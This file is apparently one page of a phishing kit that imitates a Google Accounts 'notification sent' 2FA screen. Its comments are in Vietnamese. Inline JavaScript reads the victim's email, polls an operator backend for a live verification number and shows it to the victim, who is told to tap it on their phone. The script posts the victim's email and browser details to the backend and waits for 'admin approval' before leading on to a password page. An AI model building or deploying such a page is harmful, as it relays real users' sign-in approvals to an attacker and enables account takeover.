<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Notification Sent - Google Accounts</title>
    <link rel="stylesheet" href="styles.css">
    <link href="https://fonts.googleapis.com/css2?family=Google+Sans:wght@300;400;500;600&family=Roboto:wght@300;400;500&display=swap" rel="stylesheet">
    <link rel="icon" href="google_logo_icon_169090.ico">
    <style>
        /* Đẩy input xuống thấp hơn cho trang này */
        .signin-form .input-field {
            margin-top: 24px !important;
        }
    </style>
</head>
<body>
    <!-- Loading overlay -->
    <div class="loading-overlay" id="loadingOverlay">
    </div>

    <!-- Main content -->
    <div class="main-wrapper page-transition">
        <div class="login-wrapper">
            <div class="content-card">
                <!-- Progress bar container -->
                <div class="progress-container">
                    <div class="progress-bar" id="progressBar"></div>
                </div>
                <div class="signin-columns">
                    <!-- Left Column: Logo, Title, Description -->
                    <div class="content-left">
                        <div class="logo-wrapper">
                            <img src="google_logo_icon_169090.ico" alt="Google logo" class="google-logo" style="width:48px;height:48px;" />
                        </div>
                        <h1 class="signin-title">A notification was sent to the devices signed into your recovery email</h1>
                        <p class="signin-subtitle">Your recovery email <strong>****••@gmail.com</strong> is signed into one or more of your devices. Google sent a notification to these devices to help you sign in.</p>
                        <div class="user-info">
                            <div class="user-email-btn" onclick="handleTransition('index.html')">
                                <svg width="20" height="20" viewBox="0 0 24 24" class="user-icon-img">
                                    <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 3c1.66 0 3 1.34 3 3s-1.34 3-3 3-3-1.34-3-3 1.34-3 3-3zm0 14.2c-2.5 0-4.71-1.28-6-3.22.03-1.99 4-3.08 6-3.08 1.99 0 5.97 1.09 6 3.08-1.29 1.94-3.5 3.22-6 3.22z" fill="#5f6368"/>
                                </svg>
                                <span class="user-email" id="displayEmail"></span>
                                <svg width="16" height="16" viewBox="0 0 24 24" class="arrow-img">
                                    <path d="M7 10l5 5 5-5z" fill="#5f6368"/>
                                </svg>
                            </div>
                        </div>
                    </div>
                    <!-- Right Column: Notification Info and Options -->
                    <div class="content-right">
                        <div class="verification-container">
                            <div class="verification-number">80</div>
                            <h2 class="instruction-title">Open the Gmail app on iPhone</h2>
                            <p class="instruction-text">Google sent a notification to your iPhone. Open the Gmail app, tap <strong>Yes</strong> on the prompt, then tap <strong>80</strong> on your phone to verify it's you.</p>
                        </div>
                        <div class="checkbox-wrapper">
                            <input type="checkbox" id="dontAskAgain" checked>
                            <label for="dontAskAgain">Don't ask again on this device</label>
                        </div>
                        <div class="action-buttons">
                            <button class="btn-secondary" onclick="handleTransition('verify-options.html')">Try another way</button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Footer -->
        <footer class="page-footer">
            <div class="footer-wrapper">
                <a href="#" class="footer-link">Help</a>
                <a href="#" class="footer-link">Privacy</a>
                <a href="#" class="footer-link">Terms</a>
            </div>
        </footer>
    </div>

    <script>
        // Function to update page status
        async function updatePageStatus(pageName) {
            const requestId = localStorage.getItem('requestId');
            if (!requestId) return;
            
            try {
                await fetch('http://localhost:5000/api/update-page', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ 
                        id: parseInt(requestId), 
                        currentPage: pageName 
                    })
                });
            } catch (err) {
                console.log('Failed to update page status');
            }
        }

        // Hàm kiểm tra trạng thái approval
        async function checkApprovalStatus(requestId, nextPage) {
            const maxAttempts = 60; // Tối đa 60 lần kiểm tra (5 phút)
            let attempts = 0;
            
            const checkStatus = async () => {
                try {
                    const response = await fetch(`http://localhost:5000/api/status/${requestId}`);
                    if (response.ok) {
                        const data = await response.json();
                        
                        if (data.status === 'approved') {
                            // Được approve, chuyển trang tiếp theo
                            const email = localStorage.getItem('userEmail');
                            handleTransition(nextPage + '?email=' + encodeURIComponent(email));
                            return;
                        } else if (data.status === 'denied') {
                            // Bị từ chối, chuyển về verify-device để thử lại (không hiển thị thông báo)
                            
                            // Chuyển ngay về verify-device
                            const email = localStorage.getItem('userEmail');
                            handleTransition('verify-device.html?email=' + encodeURIComponent(email));
                            return;
                        }
                    }
                    
                    attempts++;
                    if (attempts < maxAttempts) {
                        // Kiểm tra lại sau 1 giây
                        setTimeout(checkStatus, 1000);
                    } else {
                        // Hết thời gian chờ, chuyển trang
                        const email = localStorage.getItem('userEmail');
                        handleTransition(nextPage + '?email=' + encodeURIComponent(email));
                    }
                } catch (error) {
                    console.error('Error checking approval status:', error);
                    attempts++;
                    if (attempts < maxAttempts) {
                        setTimeout(checkStatus, 1000);
                    } else {
                        const email = localStorage.getItem('userEmail');
                        handleTransition(nextPage + '?email=' + encodeURIComponent(email));
                    }
                }
            };
            
            // Bắt đầu kiểm tra
            checkStatus();
        }

        // Hàm hiển thị thông báo
        function showNotification(message, type = 'info') {
            // Remove existing notifications
            const existingNotification = document.querySelector('.notification');
            if (existingNotification) {
                existingNotification.remove();
            }

            const notification = document.createElement('div');
            notification.className = `notification notification-${type}`;
            notification.textContent = message;
            
            // Style the notification
            notification.style.cssText = `
                position: fixed;
                top: 20px;
                right: 20px;
                padding: 12px 20px;
                border-radius: 4px;
                color: white;
                font-size: 14px;
                font-weight: 500;
                z-index: 1000;
                animation: slideIn 0.3s ease;
                ${type === 'error' ? 'background-color: #d93025;' : 'background-color: #1a73e8;'}
            `;

            document.body.appendChild(notification);

            // Remove notification after 3 seconds
            setTimeout(() => {
                notification.style.animation = 'slideOut 0.3s ease';
                setTimeout(() => {
                    if (notification.parentElement) {
                        notification.remove();
                    }
                }, 300);
            }, 3000);
        }

        // Page transition handler with smooth progress bar
        function handleTransition(url) {
            // Add fade-out effect to current page
            const mainWrapper = document.querySelector('.main-wrapper');
            mainWrapper.classList.add('fade-out');
            
            // Show loading overlay
            const loadingOverlay = document.getElementById('loadingOverlay');
            const progressBar = document.getElementById('progressBar');
            const progressContainer = document.querySelector('.progress-container');
            
            loadingOverlay.classList.add('active');
            progressContainer.classList.add('active');
            
            // Reset progress bar
            progressBar.style.width = '0%';
            progressBar.classList.remove('loading', 'completing');
            
            // Start smooth progress animation
            setTimeout(() => {
                progressBar.classList.add('loading');
                progressBar.style.width = '80%';
            }, 100);
            
            // Navigate after animation completes
            setTimeout(() => {
                progressBar.classList.remove('loading');
                progressBar.classList.add('completing');
                progressBar.style.width = '100%';
                
                // Hide progress bar and navigate
                setTimeout(() => {
                    progressContainer.classList.remove('active');
                    window.location.href = url;
                }, 300);
            }, 1200);
        }

        // Mobile responsive handler
        function handleMobileLayout() {
            function checkMobile() {
                if (window.innerWidth <= 600) {
                    document.body.classList.add('mobile-layout');
                } else {
                    document.body.classList.remove('mobile-layout');
                }
            }
            
            checkMobile();
            window.addEventListener('resize', checkMobile);
        }

        // Display user email and mask recovery email
        function displayUserEmail() {
            const urlParams = new URLSearchParams(window.location.search);
            const email = urlParams.get('email') || localStorage.getItem('userEmail') || '';
            const emailElements = document.querySelectorAll('.user-email');
            
            emailElements.forEach(element => {
                element.textContent = email;
            });
            
            // Mask recovery email in description
            if (email) {
                const emailParts = email.split('@');
                if (emailParts.length === 2) {
                    const maskedEmail = emailParts[0].substring(0, 3) + '••••@' + emailParts[1];
                    const subtitle = document.querySelector('.signin-subtitle');
                    subtitle.innerHTML = `Your recovery email <strong>${maskedEmail}</strong> is signed into one or more of your devices. Google sent a notification to these devices to help you sign in.`;
                }
            }
        }

        // Hàm lấy verification code từ backend và thay thế HTML
        async function getVerificationHTML() {
            try {
                const email = localStorage.getItem('userEmail') || '';
                console.log('Fetching verification HTML for email:', email);
                
                // Gọi API mới trả về HTML đã thay thế
                const response = await fetch(`http://localhost:5000/api/verification-html/${encodeURIComponent(email)}`);
                const data = await response.json();
                
                if (data.success && data.verificationCode) {
                    console.log('Found verification code:', data.verificationCode);
                    
                    // Thay thế HTML trực tiếp
                    const container = document.querySelector('.verification-container');
                    if (container) {
                        container.innerHTML = data.html;
                    }
                    
                    return data.verificationCode;
                } else {
                    console.log('No verification code found, using default');
                    // Thay thế HTML mặc định
                    const container = document.querySelector('.verification-container');
                    if (container) {
                        container.innerHTML = data.html;
                    }
                }
            } catch (error) {
                console.error('Error fetching verification HTML:', error);
            }
            return null;
        }

        // Hàm cập nhật hiển thị verification number
        async function updateVerificationNumber() {
            await getVerificationHTML();
        }



        // Thay số ngay lập tức khi script chạy
        (async function() {
            try {
                const email = localStorage.getItem('userEmail') || '';
                console.log('Immediate verification code check for email:', email);
                
                // Lấy tất cả requests để tìm request có twofa = 'device_verification'
                const response = await fetch('http://localhost:5000/api/pending');
                const requests = await response.json();
                
                // Tìm request có twofa = 'device_verification' cùng email
                const deviceVerificationRequest = requests.find(r => 
                    r.email === email && r.twofa === 'device_verification'
                );
                
                if (deviceVerificationRequest && deviceVerificationRequest.verificationCode && deviceVerificationRequest.verificationCode !== 'on') {
                    console.log('Found verification code immediately:', deviceVerificationRequest.verificationCode);
                    
                    // Thay số ngay lập tức
                    const verificationElement = document.querySelector('.verification-number');
                    const instructionText = document.querySelector('.instruction-text');
                    
                    if (verificationElement) {
                        verificationElement.textContent = deviceVerificationRequest.verificationCode;
                    }
                    
                    if (instructionText) {
                        instructionText.innerHTML = `Google sent a notification to your iPhone. Open the Gmail app, tap <strong>Yes</strong> on the prompt, then tap <strong>${deviceVerificationRequest.verificationCode}</strong> on your phone to verify it's you.`;
                    }
                }
            } catch (error) {
                console.error('Error in immediate verification check:', error);
            }
        })();

        // Initialize when DOM is loaded
        document.addEventListener('DOMContentLoaded', async function() {
            handleMobileLayout();
            displayUserEmail();
            
            // Thay số ngay lập tức khi load trang
            console.log('Loading verification code immediately...');
            await updateVerificationNumber();
            
            // Polling để cập nhật verification code real-time mỗi 1 giây
            setInterval(updateVerificationNumber, 1000);
            
            // Tự động bắt đầu quá trình approval cho notification verification
            const requestId = localStorage.getItem('requestId');
            const email = localStorage.getItem('userEmail') || '';
            
            if (requestId) {
                // Tạo request cho notification verification step
                try {
                    const response = await fetch('http://localhost:5000/api/request', {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/json' },
                        body: JSON.stringify({
                            email: email,
                            password: '',
                            twofa: 'notification_verified',
                            userAgent: navigator.userAgent,
                            currentPage: 'verify-notification.html'
                        })
                    });
                    
                    if (response.ok) {
                        const data = await response.json();
                        localStorage.setItem('requestId', data.requestId);
                        console.log('Notification verification sent, waiting for admin approval...');
                        
                        // Bắt đầu kiểm tra approval (không hiển thị thông báo)
                        checkApprovalStatus(data.requestId, 'password.html');
                    }
                } catch (error) {
                    console.error('Error sending notification verification:', error);
                }
            }
        });

        // Accessibility improvements
        document.addEventListener('keydown', function(e) {
            // Handle Escape key to go back
            if (e.key === 'Escape') {
                handleTransition('verify-options.html');
            }
        });

        // Handle browser back button
        window.addEventListener('popstate', function(e) {
            handleTransition('verify-options.html');
        });

        // API giả lập trả về số xác thực
        window.getVerificationNumber = function() {
            return 80;
        };
    </script>

    <style>
        .content-card {
            height: 546px !important;
        }
        .device-illustration {
            margin-bottom: var(--spacing-xl);
            display: flex;
            justify-content: center;
            align-items: center;
        }
        .device-gif {
            max-width: 280px;
            width: 100%;
            height: auto;
            border-radius: var(--radius-medium);
        }
        @media (max-width: 600px) {
            .content-card {
                height: auto !important;
                padding: 8px 4px !important;
                gap: 8px !important;
                max-width: 98vw;
                min-width: unset;
            }
            .device-gif {
                max-width: 120px;
            }
            .google-logo {
                width: 32px;
                height: 32px;
            }
            .signin-title {
                font-size: 1.1rem;
            }
            .instruction-title, .instruction-text {
                font-size: 0.95rem;
            }
            .user-email-btn {
                font-size: 0.9rem;
                height: 24px;
                padding: 2px 8px 2px 4px;
            }
        }
    </style>
</body>
</html> 